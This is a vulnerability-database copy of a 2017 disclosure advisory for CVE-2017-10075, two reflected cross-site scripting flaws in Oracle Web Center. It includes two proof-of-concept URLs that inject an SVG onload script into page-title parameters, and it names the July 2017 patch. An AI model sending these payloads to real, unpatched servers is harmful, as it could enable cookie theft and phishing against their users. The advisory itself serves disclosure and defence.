Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOwais MehtabPACKETSTORM:143452
HistoryJul 22, 2017 - 12:00 a.m.

Oracle Web Center 11.1.1.9.0 / 12.2.1.1.0 / 12.2.1.2.0 XSS

2017-07-2200:00:00
Owais Mehtab
packetstormsecurity.com
21

0.005 Low

EPSS

Percentile

75.3%

JSON
`Oracle Web Center XSS  
  
  
Details  
========================================================================================  
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]  
Security-Risk: High  
Remote-Exploit: yes  
Vendor-URL: https://www.oracle.com/  
CVE-ID: CVE-2017-10075  
CVSS: 8.2  
  
Credits  
========================================================================================  
Discovered by: Owais Mehtab & Tayeeb Rana  
  
  
Affected Products:  
========================================================================================  
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]  
  
  
Description  
========================================================================================  
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,  
the vulnerability can be easily exploited and can be used to steal cookies,  
perform phishing attacks and other various attacks compromising the security of a  
user.  
  
Proof of Concept  
========================================================================================  
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO  
  
  
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>  
  
  
  
  
Solution  
========================================================================================  
Apply Oracle CPU July 2017  
  
--   
Regards,  
Owais Mehtab & Tayeeb Rana  
`

Related

cvelist 1
nuclei 1
prion 1
cve 1
nvd 1
nessus 1
oracle 1
cvelist
cvelist
CVE-2017-10075
2017-08-08 15:00:00
nuclei
nuclei
Oracle Content Server - Cross-Site Scripting
2020-07-31 17:53:22
prion
prion
Design/Logic Flaw
2017-08-08 15:29:00
cve
cve
CVE-2017-10075
2017-08-08 15:29:02
nvd
nvd
CVE-2017-10075
2017-08-08 15:29:02
nessus
nessus
Oracle WebCenter Content Server Multiple Vulnerabilities (July 2017 CPU)
2017-07-21 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2017
2018-03-20 00:00:00

0.005 Low

EPSS

Percentile

75.3%

JSON
Related for PACKETSTORM:143452
cvelist1nuclei1prion1cve1nvd1nessus1oracle1